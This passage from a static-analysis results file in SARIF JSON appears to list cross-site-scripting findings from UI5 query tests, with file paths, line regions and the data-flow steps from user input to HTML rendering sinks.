null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js","uriBaseId":"%SRCROOT%","index":536},"region":{"startLine":5,"startColumn":15,"endColumn":33}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":538},"region":{"startLine":8,"startColumn":28,"endColumn":46}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":543},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":543},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js","uriBaseId":"%SRCROOT%","index":563},"region":{"startLine":8,"startColumn":28,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"353ad97f4bff4eae:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":569},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":565},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":564},"region":{"startLine":7,"startColumn":23,"endColumn":41}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js","uriBaseId":"%SRCROOT%","index":563},"region":{"startLine":8,"startColumn":28,"endColumn":46}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":569},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":569},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":574},"region":{"startLine":8,"startColumn":28,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"353ad97f4bff4eae:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":579},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":575},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":573},"region":{"startLine":7,"startColumn":23,"endColumn":41}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":574},"region":{"startLine":8,"startColumn":28,"endColumn":46}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":579},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":579},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":551},"region":{"startLine":21,"startColumn":22,"endColumn":32}}}],"partialFingerprints":{"primaryLocationLineHash":"93df5ec84a8a106e:1","primaryLocationStartColumnFingerprint":"9"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":551},"region":{"startLine":18,"startColumn":20,"endColumn":30}},"message":{"text":"/input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":547},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":551},"region":{"startLine":21,"startColumn":22,"endColumn":32}},"message":{"text":"/input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":551},"region":{"startLine":18,"startColumn":20,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":551},"region":{"startLine":18,"startColumn":20,"endColumn":30}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":8,"startColumn":5,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"74b35e217af6aa05:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":285},"region":{"startLine":10,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":8,"startColumn":5,"endColumn":50}},"message":{"text":"content={/input}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":474},"region":{"startLine":9,"startColumn":5,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"9caa0f252fbe2993:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":474},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":31,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":9,"startColumn":25,"endColumn":53}},"message":{"text":"oModel. ... input')"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":9,"startColumn":17,"endColumn":22}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":10,"startColumn":44,"endColumn":49}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":32,"startColumn":17,"endColumn":30}},"message":{"text":"output1: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":474},"region":{"startLine":9,"startColumn":5,"endColumn":40}},"message":{"text":"content={/output1}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":474},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":474},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":474},"region":{"startLine":17,"startColumn":5,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"2963bbd458e69924:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":18,"startColumn":31,"endColumn":60}},"message":{"text":"oEvent. ... Value()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":18,"startColumn":17,"endColumn":28}},"message":{"text":"sInputValue"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":19,"startColumn":44,"endColumn":55}},"message":{"text":"sInputValue"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":34,"startColumn":17,"endColumn":30}},"message":{"text":"output3: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":474},"region":{"startLine":17,"startColumn":5,"endColumn":40}},"message":{"text":"content={/output3}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":18,"startColumn":31,"endColumn":60}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470},"region":{"startLine":18,"startColumn":31,"endColumn":60}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":30,"startColumn":5,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"711f70e4b3e36d36:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":27,"startColumn":5,"endLine":29,"endColumn":30}},"message":{"text":"value={/input0}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":495},"region":{"startLine":9,"startColumn":17,"endColumn":29}},"message":{"text":"input0: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":30,"startColumn":5,"endColumn":38}},"message":{"text":"content={/input0}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":27,"startColumn":5,"endLine":29,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":27,"startColumn":5,"endLine":29,"endColumn":30}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":45,"startColumn":5,"endColumn":60}}}],"partialFingerprints":{"primaryLocationLineHash":"8d13cc83b72acee:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":42,"startColumn":5,"endLine":44,"endColumn":30}},"message":{"text":"value={/input3}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":495},"region":{"startLine":12,"startColumn":17,"endColumn":29}},"message":{"text":"input3: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":45,"startColumn":5,"endColumn":60}},"message":{"text":"content={/input3}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":42,"startColumn":5,"endLine":44,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":42,"startColumn":5,"endLine":44,"endColumn":30}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":50,"startColumn":5,"endColumn":82}}}],"partialFingerprints":{"primaryLocationLineHash":"4698f735d8a1f320:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":47,"startColumn":5,"endLine":49,"endColumn":30}},"message":{"text":"value={/input4}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":495},"region":{"startLine":13,"startColumn":17,"endColumn":29}},"message":{"text":"input4: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":50,"startColumn":5,"endColumn":82}},"message":{"text":"content={/input4}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":47,"startColumn":5,"endLine":49,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":47,"startColumn":5,"endLine":49,"endColumn":30}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":58,"startColumn":5,"endColumn":66}}}],"partialFingerprints":{"primaryLocationLineHash":"bb503c8d5e14583a:1","primaryLocationStartColumnFingerprint":"0"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499},"region":{"startLine":58,"startColumn":5,"endColumn":66}},"message":{"text":"user-provided value"}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":8,"startColumn":5,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"1406455ac263a2d9:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503},"region":{"startLine":12,"startColumn":26,"endColumn":46}},"message":{"text":"new JSONModel(oData)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":8,"startColumn":5,"endColumn":38}},"message":{"text":"content={/output}"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503},"region":{"startLine":15,"startColumn":25,"endColumn":53}},"message":{"text":"oModel. ... input')"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503},"region":{"startLine":15,"startColumn":17,"endColumn":22}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503},"region":{"startLine":16,"startColumn":43,"endColumn":48}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503},"region":{"startLine":10,"startColumn":17,"endColumn":29}},"message":{"text":"output: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":8,"startColumn":5,"endColumn":38}},"message":{"text":"content={/output}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":524},"region":{"startLine":8,"startColumn":5,"endColumn":37}}}],"partialFingerprints":{"primaryLocationLineHash":"97b29ed20ac04ff0:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":524},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":519},"region":{"startLine":8,"startColumn":40,"endColumn":63}},"message":{"text":"\"contro ... l.json\""}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":524},"region":{"startLine":8,"startColumn":5,"endColumn":37}},"message":{"text":"content={/input}"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":524},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":524},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":532},"region":{"startLine":8,"startColumn":11,"endColumn":34}}}],"partialFingerprints":{"primaryLocationLineHash":"5edd24be658b61a4:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":532},"region":{"startLine":5,"startColumn":11,"endColumn":32}},"message":{"text":"data-value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":528},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: 